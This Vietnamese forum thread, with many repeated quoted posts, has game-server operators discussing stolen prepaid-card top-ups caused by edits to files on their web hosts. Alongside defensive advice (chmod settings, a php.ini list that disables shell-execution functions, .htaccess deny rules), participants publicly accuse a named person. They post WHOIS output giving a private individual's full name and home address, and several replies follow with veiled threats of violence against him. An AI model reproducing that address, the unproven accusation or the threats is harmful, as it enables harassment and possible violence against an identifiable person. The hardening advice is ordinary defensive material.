Mấy ngày trước Mu mình bị hack thẻ , và đã biết người hack , 1 người rất quen thuộc và có tên tuổi với Mu Online ( HieuNova )
Khi Pm yahoo : do hieunova không biết đó là Mu của mình và đã bảo : sao không bảo hieunova để tránh không hack
Ừ thì không biết không có tội , mình cũng đã nhắn lại với hieunova là đừng hack nữa nhé , và hieunova cũng rủ mình làm thêm 1 Mu nhưng do bận nên mình chưa nhận lời được .
Đến hôm nay , mu mình lại bị hack thẻ , lần bị hack này giống hệt lần trước ( Bị sửa code trên hosting ) và mình đảm bảo 100% là 1 người ( HieuNova )
Cách đây cũng khá lâu , mu Hồng Ngọc của mình cũng bị HieuNova hack ( chính thangvtv , admin của bavuong.vn , muviet.vn nói với mình )
Mình nghĩ HieuNova không đến mức nghèo khổ mà làm những trò hèn hạ như vậy . ( Nếu là người khác mình không nói làm gì , nhưng HieuNova là người có nhiều người biết và tôn trọng ) . Thẻ bị hack cũng không nhiều lắm nhưng mà ức chế . Người làm chó đớp mất ( Nói hơi thô nhưng nó thật )
Đi vào vấn đề bị hack thẻ :
Bị hack ở đây là do bị sửa file trên host chứ không phải hack từ Server , nghĩa là khi mem nạp thẻ , thẻ sẽ không được gửi về Server mà vào thẳng tài khoản HieuNova
Về Hosting : mình dùng host vdata , đã thuê riêng IP riêng cho host , và Hosting chỉ để trang quản lý ( Duy nhất 1 trang quản lý )
Code nbb thì hoàn toàn sạch ( Không có shell )
Nhân tiện đây xin các bạn chỉ giáo thêm về vấn đề bảo mật cho hosting

Mấy ngày trước Mu mình bị hack thẻ , và đã biết người hack , 1 người rất quen thuộc và có tên tuổi với Mu Online ( HieuNova )
Khi Pm yahoo : do hieunova không biết đó là Mu của mình và đã bảo : sao không bảo hieunova để tránh không hack
Ừ thì không biết không có tội , mình cũng đã nhắn lại với hieunova là đừng hack nữa nhé , và hieunova cũng rủ mình làm thêm 1 Mu nhưng do bận nên mình chưa nhận lời được .
Đến hôm nay , mu mình lại bị hack thẻ , lần bị hack này giống hệt lần trước ( Bị sửa code trên hosting ) và mình đảm bảo 100% là 1 người ( HieuNova )
Cách đây cũng khá lâu , mu Hồng Ngọc của mình cũng bị HieuNova hack ( chính thangvtv , admin của bavuong.vn , muviet.vn nói với mình )
Mình nghĩ HieuNova không đến mức nghèo khổ mà làm những trò hèn hạ như vậy . ( Nếu là người khác mình không nói làm gì , nhưng HieuNova là người có nhiều người biết và tôn trọng ) . Thẻ bị hack cũng không nhiều lắm nhưng mà ức chế . Người làm chó đớp mất ( Nói hơi thô nhưng nó thật )
Đi vào vấn đề bị hack thẻ :
Bị hack ở đây là do bị sửa file trên host chứ không phải hack từ Server , nghĩa là khi mem nạp thẻ , thẻ sẽ không được gửi về Server mà vào thẳng tài khoản HieuNova
Về Hosting : mình dùng host vdata , đã thuê riêng IP riêng cho host , và Hosting chỉ để trang quản lý ( Duy nhất 1 trang quản lý )
Code nbb thì hoàn toàn sạch ( Không có shell )
Nhân tiện đây xin các bạn chỉ giáo thêm về vấn đề bảo mật cho hosting

host có để cả diễn đàn và trang quản lý hem haohoa

host có để cả diễn đàn và trang quản lý hem haohoa

Về Hosting : mình dùng host vdata , đã thuê riêng IP riêng cho host , và Hosting chỉ để trang quản lý ( Duy nhất 1 trang quản lý )

Về Hosting : mình dùng host vdata , đã thuê riêng IP riêng cho host , và Hosting chỉ để trang quản lý ( Duy nhất 1 trang quản lý )

IP riêng không có nghĩa lý gì nhé.
Vì chỉ cần biết bạn đặt web ở đâu sẽ tìm các hack local từ các site khác nằm chung server với bạn
=> bảo mật không đơn giản chỉ mình site của bạn
=> chỉ có hosting đặt tại server riêng thì mới ko bị khoản này nhé

Về Hosting : mình dùng host vdata , đã thuê riêng IP riêng cho host , và Hosting chỉ để trang quản lý ( Duy nhất 1 trang quản lý )
t cũng bít 1 cách bảo mật cho host khá là đc ... nhưng k bít bạn bít chưa ... để lại y/h mình chỉ cách này .. nếu bạn bít rồi thi thôi. còn chưa bít thì áp dụng thử

IP riêng không có nghĩa lý gì nhé.
Vì chỉ cần biết bạn đặt web ở đâu sẽ tìm các hack local từ các site khác nằm chung server với bạn
=> bảo mật không đơn giản chỉ mình site của bạn
=> chỉ có hosting đặt tại server riêng thì mới ko bị khoản này nhé
thuê hẳn cái vps 512 mà đặt web.cho an tâm chẳng lo bị local./:)

lỗi có thể xuất phát từ code như sql injection, lfi, rfi, bị găm shell
lỗi k hẳn là xuất phát từ code đâu có thể lỗi xuất phát từ con người nữa đấy
sử dụng shared hosting có thể bị local attack
anti local attack bằng cách chmod file config 400, folder 701 hoặc 711

--- Chế độ gộp bài viết ---


thuê hẳn cái vps 512 mà đặt web.cho an tâm chẳng lo bị local./:)

hacking k chỉ local attack :)
thuê vps riêng mà k tự mình config được thì thà dùng shared hosting
các dịch vụ cung cấp hosting bảo mật cao gồm có hostvn.net, pavietnam.vn, vinahost.vn

lỗi có thể xuất phát từ code như sql injection, lfi, rfi, bị găm shell
lỗi k hẳn là xuất phát từ code đâu có thể lỗi xuất phát từ con người nữa đấy
sử dụng shared hosting có thể bị local attack
anti local attack bằng cách chmod file config 400, folder 701 hoặc 711

--- Chế độ gộp bài viết ---



hacking k chỉ local attack :)
thuê vps riêng mà k tự mình config được thì thà dùng shared hosting
các dịch vụ cung cấp hosting bảo mật cao gồm có hostvn.net, pavietnam.vn, vinahost.vn

nói chung là chỉ chống được gà thôi.chứ nếu pro thì nó muốn hack cũng chống bằng trời.:-bd

lỗi có thể xuất phát từ code như sql injection, lfi, rfi, bị găm shell
lỗi k hẳn là xuất phát từ code đâu có thể lỗi xuất phát từ con người nữa đấy
sử dụng shared hosting có thể bị local attack
anti local attack bằng cách chmod file config 400, folder 701 hoặc 711

--- Chế độ gộp bài viết ---



hacking k chỉ local attack :)
thuê vps riêng mà k tự mình config được thì thà dùng shared hosting
các dịch vụ cung cấp hosting bảo mật cao gồm có hostvn.net, pavietnam.vn, vinahost.vn


Thì cũng đã Chmod thư mục 101 , file 400
Nói chung là do mình bảo mật kém nên không thể trách ai , nhưng không ngờ HieuNova lại làm thế ( Cũng quen biết nhau cả và cũng cất lời xin HieuNova không hack )

Thì cũng đã Chmod thư mục 101 , file 400
Nói chung là do mình bảo mật kém nên không thể trách ai , nhưng không ngờ HieuNova lại làm thế ( Cũng quen biết nhau cả và cũng cất lời xin HieuNova không hack )

chịu đầu tư chống thì thuê người chống hộ.vào byg hỏi xem.cần nick thì em cho mượn.:">

vẫn đau đầu về vấn đề này

chắc muôn thủa ;((

Em cũng mới bị hack thẻ hôm 14/2 đến 16/2 trong 2 ngày, mất gần 2tr tiền thẻ, khổ một cái là mất thẻ thôi thì không sao nhưng mình lại phải ngồi hỗ trợ rồi add tiền cho mem mặc dù thẻ đã bị hack, khổ sở 1 cách khó tả, Hosting được xóa toàn bộ Database và tất cả code web chỉ để lại hosting trắng thế mà hôm sau vào vẫn thấy IP lạ truy cập, cuối cùng không còn cách nào đành chuyển sang dùng của Superhost.vn thì hết 100% vì người ngoài muốn truy cập vào cpanel phải vượt qua 4 câu hỏi bảo mật của chủ host mới vào được :|, một kinh nghiệm làm Mu và bảo mật Hosting mới :(

Em cũng mới bị hack thẻ hôm 14/2 đến 16/2 trong 2 ngày, mất gần 2tr tiền thẻ, khổ một cái là mất thẻ thôi thì không sao nhưng mình lại phải ngồi hỗ trợ rồi add tiền cho mem mặc dù thẻ đã bị hack, khổ sở 1 cách khó tả, Hosting được xóa toàn bộ Database và tất cả code web chỉ để lại hosting trắng thế mà hôm sau vào vẫn thấy IP lạ truy cập, cuối cùng không còn cách nào đành chuyển sang dùng của Superhost.vn thì hết 100% vì người ngoài muốn truy cập vào cpanel phải vượt qua 4 câu hỏi bảo mật của chủ host mới vào được :|, một kinh nghiệm làm Mu và bảo mật Hosting mới :(
Em à. Chống gà thôi.
Đã dính shell thì =)) trời cứu

Chưa bao giờ bị hack thẻ cả 8-}

Thủ đoạn hack khá là tinh vi :))
Khi mem nạp thẻ đúng , còn có những dụ dỗ nạp thẻ như là
Nếu nạp thẻ đúng sẽ có thông báo đại loại như nạp > 100k đc wing 3
hay nạp > 200k đc .... gì đó
=)) Vãi Hiếu Nova

nếu bị hack ntnay chax là có shell rồi Hào Hoa ơi nếu bạn dùng cpanel 11 thì sao không vào cpanel điền IP máy tính bạn mới đc vào trang quản lý thẻ như thế nó không thể hack đc chmod lại file và thư mục đi

thế toi miếng cơm manh áo anh em rồi


1 Mu bình quân 1 triệu

10 Mu bình quân 10 triệu

20 cái ngày ......

ốm xác

Thủ đoạn hack khá là tinh vi :))
Khi mem nạp thẻ đúng , còn có những dụ dỗ nạp thẻ như là
Nếu nạp thẻ đúng sẽ có thông báo đại loại như nạp > 100k đc wing 3
hay nạp > 200k đc .... gì đó
=)) Vãi Hiếu Nova


nếu bị hack thẻ rồi thì nó đã cho shell vào rồi Hào Hoa down code về dùng norton quét đi nếu có hỏng code web rs ko thì check tay cái này chậm nhưng chắc và tìm đc hết shell

bị như thế là bị edit code r` :)
h chỉ còn cách scan shell
lọc code xong thì change pass host nói chung là mọi pass :)
80% là có shell vs backdoor

Em à. Chống gà thôi.
Đã dính shell thì =)) trời cứu
Từ lúc đổi Hosting kia hết hoàn toàn chứng tỏ bảo mật nó tốt đúng ko anh, may mà kĩ thuật của nó hỗ trợ tốt không thì giờ vẫn dính hack thẻ:|
Chắc bánh Em sút hết tất cả web cũ và làm lại mới toanh rồi cho nó chắc :)

tôi chỉ biết nói 1 câu là ức chế quá đi , tôi làm cái MU nhỏ mà nó cũng hack thèng hieunova nó ăn ở thất đức kiểu đó thì có ngày cũng nhận hậu quả thôi , nếu có trình độ đi ra nước ngoài hack ngta đi , Người VN đi hack của người VN
thua , chán nản , công sức làm mấy ngày này đổ cho chó ăn

tôi bị nó hack củng kha khá rồi.từ lúc làm đến giờ cứ sơ ý 1 tí là nó "cắn"chắc nó sống bằng nghề này là chính nên lúc nào củng chờ chực chúng ta để ra tay.mình khắc phúc bằng cách dùng 2 hosting 1 lúc.1host để intro với diễn đàn.host còn lại để home.và trỏ ip đến thì không thấy hack nữa.anh em yên tâm đi.lúc nào củng có người lần mò"số nhà"tên chôm thẻ cả.và khi có kết quả thì hắn sẽ được xữ 1 cách êm đẹp.

Không đủ trình độ bảo mật thì chịu thôi, chứ nó hack là quyền của nó :|, chứ lên đây chửi nó thì được gì đâu ...
Không khéo nhờ hieunova mà MU bớt loãng đi :))

Không đủ trình độ bảo mật thì chịu thôi, chứ nó hack là quyền của nó :|, chứ lên đây chửi nó thì được gì đâu ...
Không khéo nhờ hieunova mà MU bớt loãng đi :))

Có ai chửi bởi gì đâu =))
Tớ cũng nói là bảo mật kém thì phải chịu
Nhưng HieuNova mà đi hack thẻ thì nó cũng là 1 vấn đề đáng quan tâm
Cậu chưa bị hack thì cậu ăn nói thế thôi , mình nghĩ khi cậu bị mất thẻ thì cậu sẽ nói theo 1 cách khác

Có ai chửi bởi gì đâu =))
Tớ cũng nói là bảo mật kém thì phải chịu
Nhưng HieuNova mà đi hack thẻ thì nó cũng là 1 vấn đề đáng quan tâm
Cậu chưa bị hack thì cậu ăn nói thế thôi , mình nghĩ khi cậu bị mất thẻ thì cậu sẽ nói theo 1 cách khác

tạo 1 trang nạp thẻ riêng và đặt ở 1 chỗ khác không cùng với web.nên đặt ở sv tránh bị local.em còn gà nên chỉ nghĩ được thế.o:-)

tạo 1 trang nạp thẻ riêng và đặt ở 1 chỗ khác không cùng với web.nên đặt ở sv tránh bị local.em còn gà nên chỉ nghĩ được thế.o:-)

đồng ý với ninhmca tớ đặt web rs trên vps riêng linux nhưng hàng nước ngoài thì khỏi lo nó hack còn hieunova pro rồi làm trò trẻ con ntnay mất mặt quá

đồng ý với ninhmca tớ đặt web rs trên vps riêng linux nhưng hàng nước ngoài thì khỏi lo nó hack còn hieunova pro rồi làm trò trẻ con ntnay mất mặt quá

đặt ở vps riêng á, ý cậu ấy nói mất thẻ và có thể là hack ở chỗ cậu ấy check thẻ hoặc là viewlog hoặc 1 cách khác gì đấy mà chúng ta chưa biết =)) bây giờ kể cả cậu đặt Website ở đâu đi nữa vẫn bị hack thôi.

Không đủ trình độ bảo mật thì chịu thôi, chứ nó hack là quyền của nó :|, chứ lên đây chửi nó thì được gì đâu ...
Không khéo nhờ hieunova mà MU bớt loãng đi :))


đồng ý với ý kiến này =)).....................

Không đủ trình độ bảo mật thì chịu thôi, chứ nó hack là quyền của nó :|, chứ lên đây chửi nó thì được gì đâu ...
Không khéo nhờ hieunova mà MU bớt loãng đi :)) mình biết chú giỏi mà.chú giỏi lắm.......

mình biết chú giỏi mà.chú giỏi lắm.......

Mình biết ai bị hack thẻ mà chả tức, nhưng ở đây mình nói nếu bị hack thì phải xem lại mình, còn Mu bây giờ loãng quá rồi, phải có trình đọ nhất định thì tồn tại, còn không thì không nên mở nữa, tội member ............
MU bây giờ quá loãng vì nhiều lý do, mình cũng chả thiết quan tâm đến MU nữa rồi ............ Mong sao thị trường MU không bị loãng như bây giờ

Mình biết ai bị hack thẻ mà chả tức, nhưng ở đây mình nói nếu bị hack thì phải xem lại mình, còn Mu bây giờ loãng quá rồi, phải có trình đọ nhất định thì tồn tại, còn không thì không nên mở nữa, tội member ............
MU bây giờ quá loãng vì nhiều lý do, mình cũng chả thiết quan tâm đến MU nữa rồi ............ Mong sao thị trường MU không bị loãng như bây giờ
Không loãng để còn kiếm ăn =)) chứ nhỉ

Mình biết ai bị hack thẻ mà chả tức, nhưng ở đây mình nói nếu bị hack thì phải xem lại mình, còn Mu bây giờ loãng quá rồi, phải có trình đọ nhất định thì tồn tại, còn không thì không nên mở nữa, tội member ............
MU bây giờ quá loãng vì nhiều lý do, mình cũng chả thiết quan tâm đến MU nữa rồi ............ Mong sao thị trường MU không bị loãng như bây giờ
bạn nói tội mems,bạn có bao giờ thấy tội cho khách hàng đón nhận các sản phẩm của bạn chưa!^^?nếu bạn gập khách hàng là admin pro lâu năm hoặc hhiểu biết tí thì sản phẩm của bạn bán cho ai???nếu ko có những admin non nớt bạn tồn tại thế nào khi sản phẩm của bạn là all về muserver???

bạn nói tội mems,bạn có bao giờ thấy tội cho khách hàng đón nhận các sản phẩm của bạn chưa!^^?nếu bạn gập khách hàng là admin pro lâu năm hoặc hhiểu biết tí thì sản phẩm của bạn bán cho ai???nếu ko có những admin non nớt bạn tồn tại thế nào khi sản phẩm của bạn là all về muserver???

bạn có bao giờ thấy tội cho khách hàng đón nhận các sản phẩm của bạn chưa <<< ai ???

Các bác thử qua Aluhost.com dùng thử 1 tuần miễn phí bên em sẽ scan shell và cmod lại theo yêu cầu cho các bác xem sao. Lưu ý dùng thử 1 tuần miễn phí nhé bên em có rất nhiều khách hàng chạy MU và kiếm thế hoàn toàn chưa có trường hợp nào bị hack thẻ cả.


Trang chủ: <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

Các bác thử qua Aluhost.com dùng thử 1 tuần miễn phí bên em sẽ scan shell và cmod lại theo yêu cầu cho các bác xem sao. Lưu ý dùng thử 1 tuần miễn phí nhé bên em có rất nhiều khách hàng chạy MU và kiếm thế hoàn toàn chưa có trường hợp nào bị hack thẻ cả.


Trang chủ: <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>


hack thẻ có thể hack từ host và hack từ server chứ đâu phải mỗi host

hack thẻ có thể hack từ host và hack từ server chứ đâu phải mỗi host

Trường hợp hack từ sv khá là khó, tốt nhất up code sạch lên lại 1 lần nữa cmod hoàn chỉnh, tách riêng quản lý tài khoản khỏi home, diễn đàn

Trường hợp hack từ sv khá là khó, tốt nhất up code sạch lên lại 1 lần nữa cmod hoàn chỉnh, tách riêng quản lý tài khoản khỏi home, diễn đàn

Mình thấy Mu do aluhost mở chưa bị hack thẻ lần nào, có nhiều nguyên nhân và cách để chống :)

mu của e ngày kiếm dc có 100k , 200k cũng bị nó hack mất :((

mu của e ngày kiếm dc có 100k , 200k cũng bị nó hack mất :((

Nguyên nhân chủ yếu là do dùng hàng share có chèn shell, thứ 2 là bảo mật ...

Nguyên nhân chủ yếu là do dùng hàng share có chèn shell, thứ 2 là bảo mật ...
Ntquang
Ông thử làm Mu đi rồi biết.^.^
:o3

t nghĩ là do code NBB có vấn đề đó :)! t thì chưa bị nến cũng chưa biết =.="!
Ngừng ném gạch ném đá lại đi :-<! Cùng nhau nghĩ cách chống có phải tốt hơn không ?

Không bị hack không đồng nghĩa là bạn hay host bạn dùng bảo mật cao
Cũng có thể chưa lọt vào tâm ngắm của thằng hack , Mu của bạn không quá nổi để hacker chú ý chẳng hạn
Không phải chê bai gì nhưng mình thấy cái mu-dragon.com của ntquang hình như người chơi cũng chả nhiều cho lắm . Đó cũng là nguy nhân bạn chưa bị hack thẻ
Mình biết bạn là người code web nhưng hình như bạn hơi kiêu ngạo khi chưa bị hack ( vỏ quýt giầy có móng tay nhọn )
PS : Bạn còn giữ 300k tiền xác nhập của mình đấy , Không xác nhập được cũng chả thấy bạn nói năng gì

Không bị hack không đồng nghĩa là bạn hay host bạn dùng bảo mật cao
Cũng có thể chưa lọt vào tâm ngắm của thằng hack , Mu của bạn không quá nổi để hacker chú ý chẳng hạn
Không phải chê bai gì nhưng mình thấy cái mu-dragon.com của ntquang hình như người chơi cũng chả nhiều cho lắm . Đó cũng là nguy nhân bạn chưa bị hack thẻ
Mình biết bạn là người code web nhưng hình như bạn hơi kiêu ngạo khi chưa bị hack ( vỏ quýt giầy có móng tay nhọn )
PS : Bạn còn giữ 300k tiền xác nhập của mình đấy , Không xác nhập được cũng chả thấy bạn nói năng gì

mu đó k phải của ntquang đâu. của người khác đấy.

Của nt.quang là mu kỷ niệm thì phải ................

MU mình đâu có mở nửa đâu ...........
Còn vụ xác nhập pm lại gửi lại, bảo cậu lỗi mssql cậu không cài lại thì mình chịu, còn vụ xác nhập sv mình đã xác nhập cho nhiều MU chả vấn đề gì cả :)

Mấy ngày trước Mu mình bị hack thẻ , và đã biết người hack , 1 người rất quen thuộc và có tên tuổi với Mu Online ( HieuNova )
Khi Pm yahoo : do hieunova không biết đó là Mu của mình và đã bảo : sao không bảo hieunova để tránh không hack
Ừ thì không biết không có tội , mình cũng đã nhắn lại với hieunova là đừng hack nữa nhé , và hieunova cũng rủ mình làm thêm 1 Mu nhưng do bận nên mình chưa nhận lời được .
Đến hôm nay , mu mình lại bị hack thẻ , lần bị hack này giống hệt lần trước ( Bị sửa code trên hosting ) và mình đảm bảo 100% là 1 người ( HieuNova )
Cách đây cũng khá lâu , mu Hồng Ngọc của mình cũng bị HieuNova hack ( chính thangvtv , admin của bavuong.vn , muviet.vn nói với mình )
Mình nghĩ HieuNova không đến mức nghèo khổ mà làm những trò hèn hạ như vậy . ( Nếu là người khác mình không nói làm gì , nhưng HieuNova là người có nhiều người biết và tôn trọng ) . Thẻ bị hack cũng không nhiều lắm nhưng mà ức chế . Người làm chó đớp mất ( Nói hơi thô nhưng nó thật )
Đi vào vấn đề bị hack thẻ :
Bị hack ở đây là do bị sửa file trên host chứ không phải hack từ Server , nghĩa là khi mem nạp thẻ , thẻ sẽ không được gửi về Server mà vào thẳng tài khoản HieuNova
Về Hosting : mình dùng host vdata , đã thuê riêng IP riêng cho host , và Hosting chỉ để trang quản lý ( Duy nhất 1 trang quản lý )
Code nbb thì hoàn toàn sạch ( Không có shell )
Nhân tiện đây xin các bạn chỉ giáo thêm về vấn đề bảo mật cho hosting

đối với dân MU thì viết 1 cái tool chắc đơn giản
tool sẽ theo dõi file or folder, khi có thay đổi nội dung, file, tool sẽ gửi cảnh báo (mail, sms) log ghi nhận thông tin thay đổi, ip truy cập,...
không biết được không, vì host thì ko cho chạy soft, vps chắc được

Uppppppppppppppppppppppppppppppppppppppp !

upppppppppppppppppppppppppppppppppppppppppppp

Chưa khắc phục được nửa ah, cái này do ở server bị dính... thôi không phải do hosting đâu cũng đã từng bị.

đồng ý với ninhmca tớ đặt web rs trên vps riêng linux nhưng hàng nước ngoài thì khỏi lo nó hack còn hieunova pro rồi làm trò trẻ con ntnay mất mặt quá

cậu có biết là vps linux nước ngoài hàng cc rất nhiều sell không.sell của các sv được share từng ngày trên các diễn đàn ug.L-)

Chưa khắc phục được nửa ah, cái này do ở server bị dính... thôi không phải do hosting đâu cũng đã từng bị.

Host bị up shell là 100% rồi :-?
Nhưng chủ yếu là up qua đường nào thì mới biết và chống đc ...

Host bị up shell là 100% rồi :-?
Nhưng chủ yếu là up qua đường nào thì mới biết và chống đc ...

<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> .jpg (<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> .120x1.jpg)
ps:hình chỉ mang tính minh họa.
bạn nghĩ sao.:))

Thêm một phát hiện về hack : rvhotel.myvnc.com <=- nó hack host xong chuyển thông tin card về đây :)

còn đây là site chủ của hack <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> :)

anh em cẩn thận khi bị thì check mấy file napthe.php lại nha !

[QUOTE=ninhmca;733145]<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> .jpg (<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> .120x1.jpg)
ps:hình chỉ mang tính minh họa.
bạn nghĩ sao.:))[/QUOTE

hjhj mình đâu có bít cái này là gì đâu nhưng mình chỉ bít Hao Hoa dùng host riêng ở VN mà vẫn bị thì do nguyên cớ đâu có shell và bị hack thẻ

riverviewhotel.com.vn : Record found !
STATUS : ACTIVE
Issue Date : 21/04/2011
Expired Date : 21/04/2013
Owner Name : Ông Trần Trung Hiếu
Owner Trade Name : null
Address : 51 tổ 14 ngõ 143 Phúc Tân, Hoàn Kiếm, Hà Nội
Fax : null
DNS : dns18.fpt.vn|210.245.86.131;dns17.fpt.vn|210.245.8 6.35
Registrar Name : CN Công ty TNHH Một thành viên Viễn thông Quốc tế FPT (FTI HN)

Anh em nào ở HN làm việc nào :)!

Anh em nào ở HN làm việc nào :)!




thôi xong rồi đấy =)) anh em hà nội có việc để làm rồi kìa
mau nhận hàng =))

Có một cách để chặn việc này, sử dụng firewall để check code hoặc check theo dung lượng file, cơ chế hoạt động như sau:

1. Check theo dung lượng:

VD: File sau khi mình đã config tên tài khoản này nọ chỉ có 10KB, config vào firewall 10KB, nếu vượt hoặc thấp hơn quy định thì firewall sẽ block file, move vào safebox => hệ thống không sử dụng được => admin kịp thời phát hiện để fix.

2. Check theo code:

VD: File sau khi mình đã config tên tài khoản này nọ xong, copy toàn bộ code vào firewall, ví dụ tên tài khoản chuyển tiền vào là abcnapthe, người hack edit lại thành của họ => khác tên config ban đầu, hệ thống sẽ check và edit lại code cũ => hacker edit thoãi mái cũng không sao.

Và firewall nào thì anh em chịu khó google search nhé, ở đây không tiện nói ra vì sợ bị đụng chạm, config thời gian quét sao cho phù hợp với cấu hình máy chủ chạy web, kẻo bị treo nhé.

Và một cách đơn giản nữa là chmod quyền sử dụng, không cho edit ngoài root, còn nếu hacker nắm được cả root user thì thua !

Còn việc mua IP riêng thì vốn dĩ nó là dedicated ip nhưng cũng cùng trên 1 server mà thôi, nếu server đó bị shell thì khỏi chạy, nhưng mình nói thật, kỹ thuật ở các công ty hosting hiện giờ, số người có trình độ thật sự chỉ đếm trên đầu ngón tay, nhìu khi họ còn không biết con shell mặt mũi nó ra sao và chỉ biết gọi nó là shell thế thôi :)

Thêm một phát hiện về hack : rvhotel.myvnc.com <=- nó hack host xong chuyển thông tin card về đây :)

còn đây là site chủ của hack <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> :)

anh em cẩn thận khi bị thì check mấy file napthe.php lại nha !

Chính nó đó ( HieuNova )
mình đang bị hack theo cách này

1 khi đã shell vào rồi chỉ có cách dell cả host rồi tạo lại :-s



ko thoát được

đối với dân MU thì viết 1 cái tool chắc đơn giản
tool sẽ theo dõi file or folder, khi có thay đổi nội dung, file, tool sẽ gửi cảnh báo (mail, sms) log ghi nhận thông tin thay đổi, ip truy cập,...
không biết được không, vì host thì ko cho chạy soft, vps chắc được

code được.......................................... ....................

Đúng là vấn đề nan giải :)
thôi thì anh em làm mu cố gắng khắc phục ! ai có cách khắc phục nào tốt thì share để cùng tránh bảo :D

Đúng là vấn đề nan giải :)
thôi thì anh em làm mu cố gắng khắc phục ! ai có cách khắc phục nào tốt thì share để cùng tránh bảo :D

Cách khắc phục hiệu quả nhất

Owner Name : Ông Trần Trung Hiếu

Address : 51 tổ 14 ngõ 143 Phúc Tân, Hoàn Kiếm, Hà Nội

Cách khắc phục hiệu quả nhất

Owner Name : Ông Trần Trung Hiếu

Address : 51 tổ 14 ngõ 143 Phúc Tân, Hoàn Kiếm, Hà Nội




địa chỉ kìa anh em hà nội đâu =))

Cách khắc phục hiệu quả nhất

Owner Name : Ông Trần Trung Hiếu

Address : 51 tổ 14 ngõ 143 Phúc Tân, Hoàn Kiếm, Hà Nội

cho hỏi gần địa chỉ này có chỗ nào bán quan tài rẽ ko.nhà mình bán mà lười mang đi quá!

cho hỏi gần địa chỉ này có chỗ nào bán quan tài rẽ ko.nhà mình bán mà lười mang đi quá!



thôi xong rồi đấy ......Hiếu nova chuẩn bị nhận hàng

cho hỏi gần địa chỉ này có chỗ nào bán quan tài rẽ ko.nhà mình bán mà lười mang đi quá!

biết dc d/c thì làm đéo gì nhau nhỉ... chả lẻ tới nhà nó quỳ gối cầu xin... :S, hay cầm dao chém nó... haizvl

Ai chỉ ra bằng chứng là thằng này hay hack thẻ đi , tôi xin thịt thằng dog này

Ai chỉ ra bằng chứng là thằng này hay hack thẻ đi , tôi xin thịt thằng dog này

tks trước.dẹp bọn này đi cho ae đỡ ức.:))

--- Chế độ gộp bài viết ---


1 khi đã shell vào rồi chỉ có cách dell cả host rồi tạo lại :-s



ko thoát được
shell đã vào thì bạn dell cũng thế thôi.shell nó ở server chứ nó có ở host bạn đâu mà dell được.
đổi host khác mới đúng.:-t

Ai chỉ ra bằng chứng là thằng này hay hack thẻ đi , tôi xin thịt thằng dog này


sắp có đổ máu rồi :-s
........

Bạn để Lại yahoo mình sẽ giúp 1 cách bảo mật tốt . Hiện tại mình đang quản lý mu-hanoi.net . mình chưa gặp trường hợp như này trong SEVER của mình . chắc làm theo cách bảo mật như mình sẽ an toàn tiệt đối

Bạn để Lại yahoo mình sẽ giúp 1 cách bảo mật tốt . Hiện tại mình đang quản lý mu-hanoi.net . mình chưa gặp trường hợp như này trong SEVER của mình . chắc làm theo cách bảo mật như mình sẽ an toàn tiệt đối

có gì bạn share lên cho ae cùng bảo mật.chứ cái vấn đề này k phải 1 2 người gặp phải.phòng bệnh hơn chữa bệnh mà=D>

Bạn để Lại yahoo mình sẽ giúp 1 cách bảo mật tốt . Hiện tại mình đang quản lý mu-hanoi.net . mình chưa gặp trường hợp như này trong SEVER của mình . chắc làm theo cách bảo mật như mình sẽ an toàn tiệt đối


bạn có thể hướng dẫn qua cho anh em đi sau biết được không

bạn có thể hướng dẫn qua cho anh em đi sau biết được không

ở sv thì dùng xampp bảo mật của nbb xem.có lẽ cũng được phần nào

Nhưng mà Sẽ Pải đầu tư 1 khoảng tiền để đầu tư vào sever đấy các bạn . Sẽ an toàn tuyệt đối,

ở sv thì dùng xampp bảo mật của nbb xem.có lẽ cũng được phần nào


vẫn chết như con rết....................

ở sv thì dùng xampp bảo mật của nbb xem.có lẽ cũng được phần nào

XAPPM không bảo mật đc phần nào đâu bạn, chỉ bảo mật đc gà thôi . chứ pro thì quá đơn giản

cái này là hack qua host chứ ko liên quan đến sv :( vì host và server đặt 2 nơi khác nhau :)

nếu bạn có cách bảo mật nào thì chia sẽ tí kinh nghiệm để mọi người học hỏi :D

3. Không hiển thị lỗi nếu phát sinh
Khi có lỗi phát sinh, PHP sẽ hiện thông báo ra trình duyệt và chỉ rõ lỗi ở file nào, dòng nào và đường dẫn của file, vì thế điều này rất nguy hiểm. Để che lỗi, bạn tạo một file php.ini với nội dung như sau:

display_errors = Off
log_errors = On

Sau đó upload lên thư mục chứa website. Gợi ý: bạn nên up file php.ini trên vào các thư mục mà người dùng sẽ truy cập bằng trình duyệt, thường là thư mục chứa website, thư mục quản trị, thư mục của user …

4. Bật safe-mode (chế độ an toàn) và vô hiệu các hàm nguy hiểm
Thêm hoặc edit 3 dòng sau trong nội dung file php.ini

disable_functions = passthru, system, shell_exec, exec, dir, readfile, virtual,
proc_terminate
safe-mode = on


Tạo file .htaccess nội dung như sau:
<Files "config.php">
Order Allow,Deny
Deny from All
</Files>

chép vào ngang hàng với index.php
những file nào cần bảo mật ae thêm vào tránh bị dowload.
trình còn gà.ae nào k biết thì có thể thử.biết rồi thì thôi..:-bd

Lưu ý:
- File php.ini mình đề cập ở trên chỉ có tác dụng tại thư mục chứa nó, các thư mục không chứa nó sẽ không bị nó chi phối mà sẽ bị cấu hình trong php.ini của server chi phối.
- Các file php.ini và .htaccess nên chmod 444 để bảo vệ cấu hình.

nguồn : <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

chép vào ngang hàng với index.php
những file nào cần bảo mật ae thêm vào tránh bị dowload.
trình còn gà.ae nào k biết thì có thể thử.biết rồi thì thôi..:-bd

Lưu ý:
